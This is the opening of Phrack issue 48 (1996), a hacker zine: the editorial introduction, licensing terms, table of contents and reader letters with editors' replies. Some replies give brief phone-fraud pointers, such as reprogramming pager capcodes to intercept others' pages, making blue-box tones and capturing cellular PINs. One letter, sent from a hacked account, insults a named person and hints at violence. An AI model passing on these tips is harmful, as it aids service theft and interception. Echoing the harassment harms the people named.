home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 48.sit / Phrack Issue 48 next >
Text File  |  1997-06-06  |  618KB  |  14,231 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                    Volume Seven, Issue Forty-Eight, File 1 of 18
  4.  
  5.                                  Issue 48 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 8
  9.  
  10.                                September 1, 1996
  11.                               ___________________
  12.  
  13. ~ WARNING!  This is a TOP SECRET-MAGIC EYES ONLY document containing
  14. compartmenalized information essential to the national security of the
  15. United States.  EYES ONLY ACCESS to the material herein is strictly
  16. limited to personnel possessing MAGIC-12 CLEARANCE LEVEL.  Examination
  17. or use by unauthorized personnel is strictly forbidden and is punishable
  18. by federal law. ~
  19.  
  20.  
  21. Yes, it's the annual issue of Phrack you've all been waiting for,
  22. hopefully you have kept your security clearances current.  The delay has
  23. been a long one, much longer than anyone would have liked.  Obviously
  24. Phrack was never meant to be put out so infrequently, but the
  25. continual pressures of daily life have taken their toll on yet
  26. another editor.  Yes, those little things like going to work, paying
  27. the rent and all the other hassles that interfere with putting out a
  28. large quarterly hobbbyist publication.
  29.  
  30. It finally came down to three choices:  keep the status quo and put out an
  31. issue whenever, charge per issue, or get in some new blood.  Obviously the
  32. status quo sucked, and an issue a year was just unacceptable.  Charging
  33. everyone was even more unacceptable, even though "Information wants to
  34. be $4.95."  So, that left bringing in more people to help.
  35.  
  36. The hard thing was finding people worth bringing into the fold.
  37. There was never any shortage of people who wanted to take over the
  38. whole magazine, but it wasn't until three of them banded together and
  39. volunteered to take over the main editorial nightmare that it looked
  40. like there was a light at the end of the tunnel.  Voyager, maintainer of
  41. the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and
  42. continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and
  43. text file author extraordinaire, came forward en masse and said,
  44. "We'll do it."
  45.  
  46. Most of you have no idea how hard it is to put out a magazine like Phrack
  47. with any degree of regularity.  You have to track down articles, answer
  48. tons of mail, read all kinds of news, edit the articles (most of which
  49. were written with English as a second languge,) maintain the mailing
  50. list, maintain the WWW site, etc.  Hopefully with all the new
  51. people involved, the new division of labor will allow everyone to
  52. contribute and put out a magazine in a very timely fashion.  (And allow poor
  53. old Erikb to rest easy knowing the magazine is being taken care of so
  54. he can devote more time to being a puppet-like stooge of The Man.)
  55.  
  56. In any case, you've waited long enough...here's Issue 48.
  57.  
  58. -------------------------------------------------------------------------
  59.  
  60.                         READ THE FOLLOWING
  61.  
  62.                 IMPORTANT REGISTRATION INFORMATION
  63.  
  64. Corporate/Institutional/Government:  If you are a business,
  65. institution or government agency, or otherwise employed by,
  66. contracted to or providing any consultation relating to computers,
  67. telecommunications or security of any kind to such an entity, this
  68. information pertains to you.
  69.  
  70. You are instructed to read this agreement and comply with its
  71. terms and immediately destroy any copies of this publication
  72. existing in your possession (electronic or otherwise) until
  73. such a time as you have fulfilled your registration requirements.
  74. A form to request registration agreements is provided
  75. at the end of this file.  Cost is $100.00 US per user for
  76. subscription registration.  Cost of multi-user licenses will be
  77. negotiated on a site-by-site basis.
  78.  
  79. Individual User:  If you are an individual end user whose use
  80. is not on behalf of a business, organization or government
  81. agency, you may read and possess copies of Phrack Magazine
  82. free of charge.  You may also distribute this magazine freely
  83. to any other such hobbyist or computer service provided for
  84. similar hobbyists.  If you are unsure of your qualifications
  85. as an individual user, please contact us as we do not wish to
  86. withhold Phrack from anyone whose occupations are not in conflict
  87. with our readership.
  88.  
  89. _______________________________________________________________
  90.  
  91. Phrack Magazine corporate/institutional/government agreement
  92.  
  93.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  94. AGREEMENT.  Company's use and/or possession of this Magazine is
  95. conditioned upon compliance by company with the terms of this
  96. agreement.  Any continued use or possession of this Magazine is
  97. conditioned upon payment by company of the negotiated fee
  98. specified in a letter of confirmation from Phrack Magazine.
  99.  
  100.    This magazine may not be distributed by Company to any
  101. outside corporation, organization or government agency.  This
  102. agreement authorizes Company to use and possess the number of copies
  103. described in the confirmation letter from Phrack Magazine and for which
  104. Company has paid Phrack Magazine the negotiated agreement fee.  If
  105. the confirmation letter from Phrack Magazine indicates that Company's
  106. agreement is "Corporate-Wide", this agreement will be deemed to cover
  107. copies duplicated and distributed by Company for use by any additional
  108. employees of Company during the Term, at no additional charge.  This
  109. agreement will remain in effect for one year from the date of the
  110. confirmation letter from Phrack Magazine authorizing such continued use
  111. or such other period as is stated in the confirmation letter (the "Term").
  112. If Company does not obtain a confirmation letter and pay the applicable
  113. agreement fee, Company is in violation of applicable US Copyright laws.
  114.  
  115.     This Magazine is protected by United States copyright laws and
  116. international treaty provisions.  Company acknowledges that no title to
  117. the intellectual property in the Magazine is transferred to Company.
  118. Company further acknowledges that full ownership rights to the Magazine
  119. will remain the exclusive property of Phrack Magazine and Company will
  120. not acquire any rights to the Magazine except as expressly set
  121. forth in this agreement.  Company agrees that any copies of the
  122. Magazine made by Company will contain the same proprietary
  123. notices which appear in this document.
  124.  
  125.     In the event of invalidity of any provision of this agreement,
  126. the parties agree that such invalidity shall not affect the validity
  127. of the remaining portions of this agreement.
  128.  
  129.     In no event shall Phrack Magazine be liable for consequential, incidental
  130. or indirect damages of any kind arising out of the delivery, performance or
  131. use of the information contained within the copy of this magazine, even
  132. if Phrack Magazine has been advised of the possibility of such damages.
  133. In no event will Phrack Magazine's liability for any claim, whether in
  134. contract, tort, or any other theory of liability, exceed the agreement fee
  135. paid by Company.
  136.  
  137.     This Agreement will be governed by the laws of the State of Texas
  138. as they are applied to agreements to be entered into and to be performed
  139. entirely within Texas.  The United Nations Convention on Contracts for
  140. the International Sale of Goods is specifically disclaimed.
  141.  
  142.     This Agreement together with any Phrack Magazine
  143. confirmation letter constitute the entire agreement between
  144. Company and Phrack Magazine which supersedes any prior agreement,
  145. including any prior agreement from Phrack Magazine, or understanding,
  146. whether written or oral, relating to the subject matter of this
  147. Agreement.  The terms and conditions of this Agreement shall
  148. apply to all orders submitted to Phrack Magazine and shall supersede any
  149. different or additional terms on purchase orders from Company.
  150.  
  151. _________________________________________________________________
  152.  
  153.             REGISTRATION INFORMATION REQUEST FORM
  154.  
  155.  
  156. We have approximately __________ users.
  157.  
  158. Enclosed is  $________
  159.  
  160. We desire Phrack Magazine distributed by (Choose one):
  161.  
  162. Electronic Mail: _________
  163. Diskette:        _________  (Include size & computer format)
  164.  
  165.  
  166. Name:_______________________________  Dept:____________________
  167.  
  168. Company:_______________________________________________________
  169.  
  170. Address:_______________________________________________________
  171.  
  172. _______________________________________________________________
  173.  
  174. City/State/Province:___________________________________________
  175.  
  176. Country/Postal Code:___________________________________________
  177.  
  178. Telephone:____________________   Fax:__________________________
  179.  
  180.  
  181. Send to:
  182.  
  183. Phrack Magazine
  184. 603 W. 13th #1A-278
  185. Austin, TX 78701
  186. -----------------------------------------------------------------------------
  187.  
  188.  
  189. Enjoy the magazine.  It is for and by the hacking community.  Period.
  190.  
  191.  
  192.                Editors : Voyager, ReDragon, Daemon9
  193.                Mailboy : Erik Bloodaxe
  194.                  3L33t : Mudge  (See Below)
  195.                  Short : Security Dynamics (NSDQ:SDTI)  (See Above)
  196.           Myers-Briggs : ENTJ
  197.                   News : Datastream Cowboy
  198.     Prison Consultants : Co / Dec, Tcon
  199. Sick Sexy Horror Chick : Poppy Z. Brite
  200.              Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC,
  201.                          Sendai, Steve Fleming, The Guild
  202.                          Obi-1, Kwoody, Leper Messiah, Ace
  203.                          SevenUp, Logik Bomb, Wile Coyote
  204.      Special Thanks To : Everyone for being patient
  205.  
  206. Phrack Magazine V. 7, #48, September 1, 1996.   ISSN 1068-1035
  207. Contents Copyright (C) 1996 Phrack Magazine, all rights reserved.
  208. Nothing may be reproduced in whole or in part without written
  209. permission.  Phrack Magazine is made available quarterly to the
  210. amateur computer hobbyist free of charge.  Any corporate, government,
  211. legal, or otherwise commercial usage or possession (electronic or
  212. otherwise) is strictly prohibited without prior registration, and
  213. is in violation of applicable US Copyright laws. To subscribe, send
  214. email to phrack@well.com and ask to be added to the list.
  215.  
  216.                     Phrack Magazine
  217.                     603 W. 13th #1A-278              (Phrack Mailing Address)
  218.                     Austin, TX 78701
  219.  
  220.                     ftp.fc.net                       (Phrack FTP Site)
  221.                     /pub/phrack
  222.  
  223.                     http://www.fc.net/phrack         (Phrack WWW Home Page)
  224.  
  225.                     phrack@well.com                  (Phrack E-mail Address)
  226.                  or phrackmag on America Online
  227.  
  228. Submissions to the above email address may be encrypted
  229. with the following key : (Not that we use PGP or encourage its
  230. use or anything.  Heavens no.  That would be politically-incorrect.
  231. Maybe someone else is decrypting our mail for us on another machine
  232. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  233.  
  234. ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
  235.  
  236. Phrack goes out plaintext...you certainly can subscribe in plaintext.
  237.  
  238. -----BEGIN PGP PUBLIC KEY BLOCK-----
  239. Version: 2.3a
  240.  
  241. mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
  242. ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
  243. a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
  244. tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
  245. =q2KB
  246.  
  247. -----END PGP PUBLIC KEY BLOCK-----
  248.  
  249.  
  250.   -= Phrack 48 =-
  251.  Table Of Contents
  252.  ~~~~~~~~~~~~~~~~~
  253.  1. Introduction by the Editorial Staff                           13 K
  254.  2. Phrack Loopback / Editorial                                   55 K
  255.  3. Line Noise (Part I)                                           63 K
  256.  4. Line Noise (Part II)                                          51 K
  257.  5. Phrack Pro-Philes on the New Editors                          23 K
  258.  6. Motorola Command Mode Information by Cherokee                 38 K
  259.  7. Tandy / Radio Shack Cellular Phones by Damien Thorn           43 K
  260.  8. The Craft Access Terminal by Boss Hogg                        36 K
  261.  9. Information About NT's FMT-150/B/C/D by StaTiC                22 K
  262. 10. Electronic Telephone Cards (Part I)                           39 K
  263. 11. Electronic Telephone Cards (Part II)                          66 K
  264. 12. Keytrap Revisited by Sendai                                   13 K
  265. 13. Project Neptune by Daemon9                                    52 K
  266. 14. IP-Spoofing Demystified by Daemon9                            25 K
  267. 15. Netmon by Daemon9                                             21 K
  268. 16. The Truth...and Nothing but the Truth by Steve Fleming        19 K
  269. 17. International Scenes by Various Sources                       33 K
  270. 18. Phrack World News by Datastream Cowboy                        21 K
  271.  
  272.                                                     Total:       633 K
  273.  
  274. _______________________________________________________________________________
  275.  
  276.  
  277. "The culture of criminal hackers seems to glorify behavior which would be
  278. classified as sociopathic or frankly psychotic."
  279. (Mich Kabay, director of education, NCSA, NCSA News, June 1996)
  280.  
  281. "The Greek word 'diarrhein,' which means 'to flow through,' describes
  282. diarrhea very well."
  283. (Gross-ology by Sylvia Branzei, Planet Dexter, 1996)
  284.  
  285. "Fuck you, clown!"
  286. (Thee Joker, Defcon IV, July 28, 1996)
  287.                               ==Phrack Magazine==
  288.  
  289.                    Volume Seven, Issue Forty-Eight, File 2 of 18
  290.  
  291.                                 Phrack Loopback
  292.  
  293. -----------------------------------------------------------------------------
  294.  
  295.         This is a response to the letter from KoV included in "Line Noise
  296. Part I" from Phrack #47.  After reading this open letter, I nearly died of
  297. laughter.  The inaccuracies of KoV's story were numerous and comical.
  298. However, from the way KoV presented themselves, they are acting as if
  299. it was their BBS network and a government conspiracy that has gotten
  300. them into trouble.  As a result, they will appear to many as a
  301. wrongfully persecuted group of computer users.
  302.  
  303.         Apparently, KoV likes to fancy themselves as a group that
  304. spread "open-minded" and "sociopolitical" beliefs through their BBS
  305. network, KoVNet.  They claim that they "questioned [the] authority" of
  306. those who "tried to oppress [their] free-thinking minds."  They then
  307. state that this caused the "AmeriKKKan" government to monitor their
  308. actions, "stalk [them] in public places", and and attempt to destroy
  309. them "from the moment of KoV's conception."  
  310.  
  311.         This is ridiculous.  First off, their BBS network was not
  312. enough to cause the government to stalk them in public.  If a BBS
  313. network that contains disdain for the American government justifies
  314. the stalking of its users, then NUMEROUS people in this country are
  315. currently being followed in public.  Therefore, KoV's claim about
  316. their threatening BBS network is an attempt to make 
  317. themselves look bigger and more important than they were.
  318.  
  319.         Now, let us look at the real reason they are facing legal
  320. actions.  KoV is blaming "false accusations from a local university"
  321. for their troubles.  However, the accusations are not false and
  322. after you read what led them to be caught, you will reallize that KoV
  323. was never a threat to the government.
  324.  
  325.         I do not know exactly how many universities they hacked.
  326. However, if it is one local university as they claim, it is Skidmore 
  327. in Saratoga Springs NY, the university which I attend.  I myself have played
  328. around with Skidmore's computers and do not feel any loyalty or
  329. patriotism to my school.  Therefore, it is not a grudge I am harboring
  330. against KoV for hacking Skidmore's system that is causing me to write
  331. this.  It is merely the fact that KoV is distorting the truth in an
  332. attempt to turn themselves into martyrs. 
  333.  
  334.         Personally, I cannot blame anyone for breaking into Skidmore's
  335. system.  Since Skidmore was relatively new to the Internet, their
  336. security was very lax making it very easy to explore and play around
  337. with the system.  If KoV had any knowledge whatsoever, they would not have
  338. been caught or even detected by Skidmore.  It was their egos and lack
  339. of knowledge that led to their investigation.  I myself saw with my
  340. own eyes how they were detected.
  341.  
  342.         The system that was hacked by KoV was wopr.skidmore.edu.
  343. Well, one day I took a look at the system logs for WOPR and saw "root
  344. login from [some out of domain ip address]" standing out quite well.
  345. If KoV was really so Knowledgable and dangerous, wouldn't they know how to
  346. edit system logs?  However, they did not which shows KoV is another
  347. example of people who managed to obtain root access and did not know
  348. what to do with it.
  349.  
  350.         Some people would think, "Big deal! Just because they didn't
  351. edit the system logs does not mean that they could ever be linked to
  352. the crime."  This is very true.  However, this would have required KoV
  353. to keep their mouths shut about the incident.  Yet, they did not.
  354. Apparently, Lord Valgamon made a post to some of the BBS networks he
  355. frequented where he showed off about hacking Skidmore and told
  356. everyone how he did it.  
  357.  
  358.         This hurt KoV greatly.  As a result, a narc on the BBS network
  359. alerted CERT about Lord Valgamon's claims who, in turn, reported the
  360. incident to Skidmore.  This caused Skidmore to now have a name, though
  361. anonymous, to apply to the break in.  Consequently, the proper
  362. authorities became involved and they began to track down Lord Valgamon
  363. on the BBS networks.
  364.  
  365.         From the above facts, you can probably guess that the
  366. "AmeriKKKan" government would never have a special interest in KoV
  367. because they are the typical stereotype of an "ELiTE M0DeM d00d."  If
  368. Lord Valgamon and KoV had kept their mouths shut about the incident,
  369. they never would have been caught.  However, KoV needed to tell their
  370. ELiTE BBS scene how bad-ass they were and, as a result, their
  371. bad-asses are getting spanked hard.  
  372.  
  373.         KoV had not done any crime or brought up any controversy
  374. against the government.  Their only crime was that they were stupid.
  375. I understand that KoV is now asking for the support of the h/p and
  376. political groups in the scene.  However, I would not recomend anyone
  377. to give them support.  There was no government conspiracy against KoV
  378. and everything that has happened to them was brought on by their own
  379. stupidity.  Do not turn a bunch of egotistical and immature criminals
  380. into martyrs.  I will end this with the same words KoV started their
  381. letter with: "Don't believe the hype." - Public Enemy.
  382.  
  383. Sincerely,
  384. Mr. Sandman
  385.  
  386. [ Wow.  Well, we always like to hear all sides to any story, and each
  387.   time something gets published that gets under someone else's skin, we
  388.   inevitably do.  Thanks for writing! ]
  389.  
  390.  
  391. -----------------------------------------------------------------------------
  392.  
  393. Hello!
  394.  
  395. Let me tell some words about myself. Computers and
  396. telecommunications take quite important place in my life. In
  397. past I worked as a programmer, system administrator and finally
  398. I ran my own business selling computer hardware (now I have
  399. closed this business because I have lost my interest for trade
  400. and due to some financial reasons). I owned my own BBS for
  401. several years but now I have it shut down because I do not want
  402. support lamers leeching files 2-3 years old and having no ideas
  403. what email is. Now almost every day I spent many hours reading
  404. Internet newsgroups, mainly dedicated to phreaking/hacking.
  405.  
  406. A friend of mine, gave me some Phrack issues (newest was #42 of 1993).
  407. I have read them and like them very much.
  408.  
  409. If it is possible, please drop me a line how could I subscribe
  410. to Phrack magazine. If you do, please encrypt your reply and
  411. send it via anonymous remailer, because now Russian government
  412. begun to control email messages very thoroughtly.
  413.  
  414. I have private information from friend Internet provider about
  415. the FAPSI (Federal Agency of Government Communications and
  416. Information -- some form of Russian NSA/FCC hybrid formed from
  417. ex-KGB agents) actions aimed to control data passed through
  418. Internet channels in Russia. FAPSI ordered all Internet
  419. providers in St.Petersburg to install software which task will
  420. be to copy all messages addressed to/from persons which FAPSI
  421. interested in and to scan for some keywords specified by FAPSI.
  422.  
  423. Providers will get their licences for providing communication
  424. service only after installing such spy software. There is a
  425. rumour that FAPSI has installed hidden microphones (bugs) in
  426. providers' offices to control any "illegal" activity (free
  427. information exchange always was illegal in USSR/Russia). I say
  428. "rumour" because I have heared it only from one trusted source,
  429. other information came from several trusted sources
  430. simultaneously.
  431.  
  432. BTW, using a PGP is illegal in Russia too, because FAPSI can not
  433. break the PGP-encrypted messages.
  434.  
  435. If you find information written above meaningful, you may use it
  436. in your own discretion but with some precautions -- remember
  437. that country I live in have barbaric laws and Russian
  438. Police/Security Services have _absolute_ power to put in jail
  439. anyone they want without any court or warrant.
  440.  
  441. [ Normally I strip out all anonymous remailers, because they
  442.  interfere with the bulk mailing process, bounce mail, and generally
  443.  screw things up...however, there are always exceptions.
  444.  
  445.  The FAPSI requirements are extremely interesting to hear about.  It
  446.  certainly makes sense, and I fear that our country is likewise heading
  447.  towards that goal.
  448.  
  449.  If you get the chance, you ought to write more about being a hacker
  450.  in your country, since I am sure the rest of the world would be
  451.  fascinated by it. ]
  452.  
  453. -----------------------------------------------------------------------------
  454.  
  455. Greetings...
  456.  
  457. I looking for just a nibble of information...
  458.  
  459. When one logs into a remote system and gets login and passwords questions 
  460. how does one write a program to crack a password...
  461.  
  462. I'm sure that is not an easy question or even a nibble perhaps a byte...
  463.  
  464. Seeking Info,
  465. SPY
  466.  
  467. [ Well, I can't tell you how to write a program to crack passwords
  468.   without knowing what kind of system you want to crack passwords for.
  469.  
  470.   I can't tell you how to say "Where is the bathroom" in a foreign
  471.   language without first knowing what language you want to say it in.
  472.  
  473.   If you are talking about UNIX passwords, there are already numerous
  474.   programs written to "crack" passwords.  I would suggest you go poke around
  475.   and look for programs like "crack" or "killer cracker."  If you
  476.   can't find reference to either of these on the net, then you really
  477.   ought to consider finding a new hobby. ]
  478.  
  479. -----------------------------------------------------------------------------
  480.  
  481. Wuzup! I have a pager that I don't use anymore because I can't afford the
  482. bill.  So I was wondering if there is anyway I can hook-up my pager for free
  483. without going through a paging service.
  484.  
  485. [ Depending upon the pager, you can possibly change or add capcodes through
  486.   special programming software.  Almost all Motorola pagers allow you to do
  487.   this.
  488.  
  489.   This won't allow you to "really" get free service, but you can piggy back
  490.   on top of some known person's pager service (or just intercept their pages.)
  491.  
  492.   The only way to get "free" service is to reactivate the pager's current
  493.   capcode in the paging system from the local provider who owns the frequency
  494.   the pager is crystaled for. ]
  495.  
  496. -----------------------------------------------------------------------------
  497.  
  498. I was browsing through Issue 47, and saw something that had caught 
  499. my eye.
  500.  
  501.  
  502. ""THE HACKER WAR  --  LOD vs MOD"
  503.  
  504. This t-shirt chronicles the infamous "Hacker War" between rival
  505. groups The Legion of Doom and  The Masters of Destruction.  The front
  506. of the shirt displays a flight map of the various battle-sites
  507. hit by MOD and tracked by LOD.  The back of the shirt
  508. has a detailed timeline of the key dates in the conflict, and
  509. a rather ironic quote from an MOD member."
  510.  
  511. A few weeks ago, I read the book Masters of Deception, a book about
  512. the "war".  Wasn't the name of the rival group Masters of Deception?  
  513. I assume that Erik would know, he appeared to be the main "villain" in 
  514. this version of the story.  Any response would be appreciated.
  515.  
  516.  
  517. [ I was the villain?  Well corn my pone.
  518.  
  519.   In any case, you should always take everything you read with a grain of
  520.   salt.  In my opinion, the book was a piece of shit.  Since many of the
  521.   MOD members decided to viciously attack the author, Josh Quittner, posing
  522.   as the ILF, I can only assume that they felt likewise.
  523.  
  524.   So you decide for yourself about all that.  Oh, and buy the damn
  525.   t-shirt.  http://www.fc.net/phrack/shirts.html ]
  526.  
  527. -----------------------------------------------------------------------------
  528.  
  529.  
  530. Hi Can you teach me to be a hacker i think that that would be cool so what do
  531. you think can you teach me to be a hacker and to be cool you are one of the
  532. biggest hackers in the world
  533.  
  534. [ No, I'm afraid as one of the biggest hackers in the world, I'm far too
  535.   important to expend any energy on the likes of you.
  536.  
  537.   Now go back to your PlayStation and get better at Toshinden. ]
  538.  
  539. -----------------------------------------------------------------------------
  540.  
  541.  
  542. Where culd i find some zipped red box tones? Or blue box.
  543. CyberOptik
  544.  
  545. [ Make your own tones with the Blue Beep program.
  546.  
  547.   Follow some of the links from the Phrack Home page, and you should
  548.   find this program on any number of sites. ]
  549.  
  550. -----------------------------------------------------------------------------
  551.  
  552. Hallo, din Gamle ÿrn!!
  553. (Norwegian for: Hello, you Old Eagle!!(direct.translated.)
  554. (ÿrn(Eagle) is pronounced like: earn ) End of Norw. lesson.
  555.  
  556. This is a question from one viking to another; I am a newbie in the H/P
  557. division so I spend my days(and nights!) dwnloading all i can find about the
  558. subject. But I do have some problems with the cellular phone system over
  559. here, NMT 900. Which your system AMPS have stolen all the good parts from!
  560. Untill last year i could program my cellular phone, Ericsson NH 99, by
  561. programming and switching the 27c512 prom. But now the norwegian
  562. telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone
  563. number used to be 12 34 56 78 (we have 8 digits), then my phone number now
  564. has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the
  565. owner of the phone.
  566.  
  567. I do have programs and cables for programming the phone with all 8+3 digits,
  568. but then I have to know the 3 digits, the pin code, and I do NOT know how
  569. to download them from the cellular traffic going around my place. Can you
  570. help me beat the system? How do I dwnload the pin code???? I read that they
  571. are going to use the same system i the N.Y. area within this year, so someone
  572. is going to ask you these qst. sooner or later. Be prepared! Or is my qst.
  573. old news? Maybe everyone knows how to do this? Exept the norwegian newbie....
  574.  
  575. Vennlig hilsen
  576. (thats:Best regards)
  577.  
  578. Stian(Mr.Phonee) Engerud
  579.  
  580. [ I'm not sure I understand how the last 3 digits can be unknown to the
  581.   owner of the phone.  If your number changes, then obviously you have to
  582.   know the new number.  Are you sure this isn't just a touch-tone PIN
  583.   entered in when you use phone, like systems over here in the states?
  584.  
  585.   If it is, then you'll still need some kind of ESN reader, or other means
  586.   to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone
  587.   decoder to grab the PINS as well.  It's incredibly annoying.
  588.  
  589.   On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems
  590.   in place.  Have they upgraded their ETACS systems as well?  If not,
  591.   use those. ]
  592.  
  593. -----------------------------------------------------------------------------
  594.  
  595. From: zadox@mindspring.com (Ron Zalkind)
  596. Subject: Phrack Magazine: Strategic Marketing Partnership
  597.  
  598. I'm one of the principals of a new Internet-based, second-generation,
  599. Information Technology service. This new Internet service debuted last week
  600. at the Culpepper Forum in Atlanta. I'd like to propose a strategic marketing
  601. partnership with Phrack Magazine. This proposal will spell out what it is
  602. our service does (including a product demo), how we think a partnership with
  603. Phrack Magazine might work, and how we can all increase profits by doing so.
  604. Please reply to this E-mail with the name and E-mail address of the
  605. 'director of online strategy', or the 'circulation director', for Phrack
  606. Magazine. Thank you.
  607.  
  608. Ron Zalkind, President
  609. R.E. Zalkind & Co. Inc.
  610. Voice: 770-518-1600
  611. Fax: 770-642-0802
  612. E-mail: zadox@mindspring.com (Ron Zalkind)
  613. Ron Zalkind
  614.  
  615. [ WOW!  I can't wait to hook up with THESE incredibly savvy people
  616.   so Phrack can dramatically increase our profits.  Let's see, if we
  617.   make any money, we'll see a 100% increase!  It's a no-lose
  618.   situation.
  619.  
  620.   Man, I hate Internet mass-mailers.  Don't these people attempt to qualify
  621.   their leads even a LITTLE?  Strategic Marketing Opportunities with
  622.   free computer hacker magazines?  Ron? Hello? ]
  623.  
  624. -----------------------------------------------------------------------------
  625.  
  626.  
  627.    First of all, great work on the 'zine all these years, hope to see 48
  628. soon. 
  629.  
  630.    I have an article from "Airman" magazine (I believe it was the April
  631. 1996 issue), the US Air Force magazine given to military members.  It
  632. details the efforts of AFOSI (Air Force Office of Special Investigations)
  633. to prevent hackers from breaking in to military computers.  Considering
  634. it's coming from the military, it's not too badly written (the author
  635. actually knew the difference between "crackers" and "hackers").  I don't
  636. have a scanner, but I'd be more than willing to snail mail it to you.  I
  637. just wanted to check and see if you guys already had it of not.  If you
  638. don't, let me know, and I'll get it to you ASAP. 
  639.  
  640.    Keep up the good work....
  641.  
  642. [ We would definately like to see the text from this article.  Please
  643.   forward it!
  644.  
  645.   In fact, if any of you readers ever come across ANYTHING you think is cool,
  646.   email it to us, or snail mail it.  We love getting mail.
  647.   We will print anything cool.  (And a lot of lame things too!)
  648.  
  649.   Just stop sending us credit histories and password files.  :)  ]
  650.  
  651. -----------------------------------------------------------------------------
  652.  
  653. need access to w.gov xxx now
  654.  
  655. [ w.gov?   Uh, ok, let's see:
  656.  
  657.   Reserved Domain (W-GOV-DOM)
  658.  
  659.      Domain Name: W.GOV
  660.  
  661.      Administrative Contact, Technical Contact, Zone Contact:
  662.            Internet Assigned Numbers Authority  (IANA)  iana@isi.edu
  663.                  (310) 822-1511
  664.  
  665.      Record last updated on 02-Dec-93.
  666.         Record created on 01-Dec-93.
  667.  
  668.  
  669.   Do you know what this means?  Duh. ]
  670.  
  671. -----------------------------------------------------------------------------
  672.  
  673. From: health@moneyworld.com
  674. Subject: Scientific Discoveries Minimize Aging (DHEA)
  675.  
  676. http://dhea.natureplus.com
  677.  
  678. Take advantage of the amazing benefits of DHEA. In the search for the 
  679. FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and 
  680. acting 25.
  681.  
  682. Read the medical research  at  http://dhea.natureplus.com .A quote from 
  683. an article published by the New York Academy of Science written by Dr. 
  684. S.S.C.YEN; 
  685.   "DHEA in appropriate replacement doses appears to have remedial effects 
  686.    with respect to its ability to induce an anabolic growth factor, increase 
  687.    muscle strength and lean body mass, activate immune function, and enhance 
  688.    quality of life in aging men and women, with no significant adverse effects."
  689.  
  690. Regain the eye of the tiger! Don't wait ! Click on:  http://dhea.natureplus.com
  691.  
  692. To terminate from the Health Catalog, Reply to health@moneyworld.com with
  693. "remove" in the subject field. Bob Williams 206-269-0846
  694.  
  695. P.S.  You will find a full line of Vitamin, Supplements and OTC Health 
  696. Catalog at http://natureplus.com.
  697.  
  698. [ Yet another Mass mailing!  How many lame mailing lists are we on?
  699.   You have to wonder about these things.
  700.  
  701.   But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH!
  702.   I need to get me some of that.  A little DHEA, a little GHB, a little
  703.   DMT, and you'll look younger, feel younger, and have the brain of
  704.   a two year old.
  705.  
  706.   And besides, Jesus loves acronyms. ]
  707.  
  708. -----------------------------------------------------------------------------
  709.  
  710. Do you listen to 2nur radio?  If so have you ever heard a band named
  711. SOYLENT GREEN or GOITER on any of their shows?
  712. please email me back
  713. thanx,
  714. Nick
  715.  
  716. [ Nick, I hate to break it to you, but:
  717.  
  718.   SOYLENT GREEN IS PEOPLE!!!
  719.   IT'S PEOPLE!!!!! ]
  720.  
  721. -----------------------------------------------------------------------------
  722.  
  723. From: Pete Shipley <shipley@dis.org>
  724. To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu,
  725.         daddict@l5.com, dc-stuff@fc.net, dtangent@defcon.org,
  726.         emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com,
  727.         mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us,
  728.         proff@suburbia.org, root@iss.net, root@l0pht.com, root@lod.com,
  729.         root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net,
  730.         will@command.com.inter.net, zen@fish.com
  731. Subject: Shipley owned, hacked and thrashed
  732.  
  733.  
  734. Please distribute this letter freely:
  735.  
  736. This posting is being made from dis.org, and this is not forged e-mail.
  737. Even though this mail is coming from Peter Shipley's account, I am not him.
  738.  
  739. Who am I?
  740.  
  741. That is unimportant except to say that I cannot take anymore of the
  742. "DoC" crowd's BULLSHIT.  I would like to raise an issue with them, mostly
  743. (but not all related to the incident at defcon).
  744.  
  745. To you drunken losers at defcon who had to fuck with Netta's speech (DoC
  746. on hold here for a second, it wasn't just them):  If you didn't want to hear
  747. Netta's speech (though in your opinion it may be monotone, boring or even
  748. wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT.  There were some people that
  749. WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST
  750. ASSES.  How different are you now from a government that would like to 
  751. enforce censorship upon it's own people?
  752.  
  753. All I can say is "getbacks are a bitch".  A few things to consider:
  754.  
  755. 1.    Shipley is an utter tool.  His whole appearance is a front.  If he's
  756. such an awesome security specialist then why was he so easily owned?  Also
  757. I bring into question some of the motives he has for harassing Netta Gilboa.
  758. Her boyfriend (who is currenlty in jail) was known for continually hacking
  759. (yes CONTINUALLY hacking) Peter Shipley.  I know this because I spoke with
  760. Chris (n00gz) many times and was aware of this fact.
  761.  
  762. In my opinion Petey, anyone that is foolish enough to hire you to secure their
  763. systems are idiots; whether it's the military, government, industry, a
  764. business -- they should all just ask for their money back. You are a discredit
  765. to your profession.
  766.  
  767. 2.    Shipley is a coward.  Only cowards attack people weaker than them
  768. but back away from a confrontation with someone of equal size or power.
  769. Careful Peter -- next time don't piss off Bootleg, he might hurt that pretty
  770. boy face of yours (though I admit, I would like to see it)
  771.  
